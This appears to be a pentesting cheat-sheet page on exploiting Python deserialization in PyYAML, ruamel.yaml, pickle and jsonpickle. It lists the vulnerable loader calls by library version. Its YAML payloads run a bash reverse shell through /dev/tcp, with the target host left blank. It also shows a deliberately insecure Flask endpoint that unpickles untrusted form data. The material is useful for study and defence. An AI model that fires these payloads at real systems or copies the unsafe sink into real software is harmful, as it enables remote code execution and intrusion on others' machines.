Python Deserialization


Python's built-in serialization modules, such as pickle and cPickle, PyYaml, are commonly used for serializing and deserializing data. However, if the deserialization process is not properly secured, it can be exploited by attackers to execute arbitrary code or perform other malicious activities.


PyYaml Deserialization

Since PyYaml version 5.4, the default loader for load has been switched to SafeLoader mitigating the risks against Remote Code Execution.

The vulnerable sinks are now:

import yaml
from yaml import Loader, UnsafeLoader
data = b'!!python/object/new:os.system ["bash -c \'bash -i >& /dev/tcp/ 0>&1\'"]'

yaml.load(data, Loader=UnsafeLoader)
yaml.load(data, Loader=Loader)

On PyYaml versions >= 5.1 (and inferior to 5.4) we can use following functions

import yaml
from yaml import Loader, UnsafeLoader, FullLoader
data = b'!!python/object/new:os.system ["bash -c \'bash -i >& /dev/tcp/ 0>&1\'"]'

yaml.load(data) #works under certain conditions
yaml.load(data, Loader=Loader)
yaml.load(data, Loader=UnsafeLoader)
yaml.load(data, Loader=FullLoader)
yaml.load_all(data) #works under certain conditions
yaml.load_all(data, Loader=Loader)
yaml.load_all(data, Loader=UnsafeLoader)
yaml.load_all(data, Loader=FullLoader)

In order for load() and load_all() to deserialize custom class objects, subprocess have to be imported if we use Popen in our payload. Serialized object of os.system won't works.

You can still use !!python/object/new:str payload.

On PyYaml versions inferior to 5.1 we can use following functions

import yaml
from yaml import Loader, UnsafeLoader, FullLoader
data = b'!!python/object/new:os.system ["bash -c \'bash -i >& /dev/tcp/ 0>&1\'"]'

yaml.load(data, Loader=Loader)
yaml.load_all(data, Loader=Loader)

Ruamel.yaml Deserialization

To deserialize in ruamel.yaml , following methods are vulnerable to arbitrary code execution:

import ruamel.yaml
data = b"""!!python/object/apply:subprocess.Popen
- ls"""

ruamel.yaml.load(data, Loader=ruamel.yaml.Loader)
ruamel.yaml.load(data, Loader=ruamel.yaml.UnsafeLoader)
ruamel.yaml.load(data, Loader=ruamel.yaml.FullLoader)
ruamel.yaml.load_all(data, Loader=ruamel.yaml.Loader)
ruamel.yaml.load_all(data, Loader=ruamel.yaml.UnSafeLoader)
ruamel.yaml.load_all(data, Loader=ruamel.yaml.FullLoader)

Pickle/cPickle Deserialization

The python pickle and cPickle (implementation of Pickle in C) modules, that serializes and deserializes a Python object, are vulnerables to remote code execution. If the website uses this modules, we may be able to execute arbitrary code.

With Pickle deserialization ,the following code is vulnerable to arbitrary code execution using the pickle.load() function without proper sanitization of the input.

import pickle
import base64
from flask import Flask, request

@app.route("/hackme", methods=["POST"])
def hackme():
    data = base64.urlsafe_b64decode(request.form['pickled'])
    deserialized = pickle.loads(data)
    # do something with deserialized or just
    # get pwned.

    return '', 204

Jsonpickle Deserialization

Jsonpickle is a python library for serializing any arbitrary object graph into JSON.

With jsonPickle deserialization ,the following code is vulnerable to arbitrary code execution using the jsonpickle.decode() function without proper sanitization of the input.

import jsonpickle
some_parameter = jsonpickle.decode(malicious)


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